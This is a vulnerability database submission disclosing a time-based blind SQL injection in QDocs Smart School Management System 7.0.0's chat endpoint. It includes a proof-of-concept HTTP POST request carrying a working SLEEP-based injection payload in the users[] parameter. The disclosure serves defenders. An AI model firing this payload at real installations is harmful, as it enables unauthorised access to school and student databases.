提出 #407385: QDocs QDocs Smart School Management System 7.0.0 SQL Injection情報

タイトル	QDocs QDocs Smart School Management System 7.0.0 SQL Injection
説明	A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data. This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system. Impact: Execute Arbitrary SQL Commands Infer Sensitive Information Compromise Data Integrity Proof of Concept (PoC): POST /user/chat/mynewuser HTTP/1.1 Host: [placeholder-host] Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft Content-Length: 79 Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126" Accept-Language: en-US Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Linux" Origin: https://[placeholder-host] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[placeholder-host]/webtest/user/chat Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM Discovered By: Jobyer Ahmed
ソース	⚠️ https://github.com/bytium/vulnerability-research/blob/main/Advisory%20for%20Time-Based%20Blind%20SQL%20Injection%20in%20QDocs%20Smart%20School.md
ユーザー	suffer (UID 74855)
送信	2024年09月12日 23:41 (2 年 ago)
モデレーション	2024年09月13日 15:09 (15 hours later)
ステータス	承諾済み
VulDBエントリ	277435 [QDocs Smart School Management System 7.0.0 Chat /user/chat/mynewuser users[] SQLインジェクション]
ポイント	20

◂ 前概要次 ▸

Do you need the next level of professionalism?

Upgrade your account now!